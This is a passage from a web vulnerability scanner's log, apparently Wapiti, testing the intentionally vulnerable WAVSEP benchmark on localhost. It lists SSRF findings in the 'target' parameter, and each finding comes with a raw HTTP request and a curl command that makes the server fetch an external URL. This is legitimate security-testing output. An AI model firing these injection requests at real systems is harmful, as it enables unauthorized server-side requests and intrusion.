curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:39+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1936/746172676574/1527559539-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:39+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1937/746172676574/1527559539-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:38+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1940/746172676574/1527559538-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:38+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1943/746172676574/1527559538-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:40+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1945/746172676574/1527559540-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:40+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1948/746172676574/1527559540-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:40+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1952/746172676574/1527559540-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:40+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1953/746172676574/1527559540-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-404Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:39+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1954/746172676574/1527559539-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:39+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1958/746172676574/1527559539-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:39+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1959/746172676574/1527559539-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:39+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/1961/746172676574/1527559539-174.119.60.74.txt
POST /wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
Referer: http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp
Content-Type: application/x-www-form-urlencoded

target=http%3A%2F%2Fexternal.url%2Fpage
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-POST-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:20+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/216/746172676574/1527559520-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:20+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/222/746172676574/1527559520-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:21+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/224/746172676574/1527559521-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:20+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/225/746172676574/1527559520-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-200Valid/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:22+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/235/746172676574/1527559522-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:22+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/242/746172676574/1527559522-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:22+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/243/746172676574/1527559522-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:22+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/244/746172676574/1527559522-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:21+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/264/746172676574/1527559521-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:21+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/265/746172676574/1527559521-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:21+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/266/746172676574/1527559521-174.119.60.74.txt
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fexternal.url%2Fpage"

Vulnerability found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-302Redirect/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

SSRF vulnerability via injection in the parameter target.
The target performed an outgoing HTTP GET request at 2018-05-29T04:05:21+02:00 with IP 174.119.60.74.
Full request can be seen at https://wapiti3.ovh/ssrf_data/rk08f4/269/746172676574/1527559521-174.119.60.74.txt
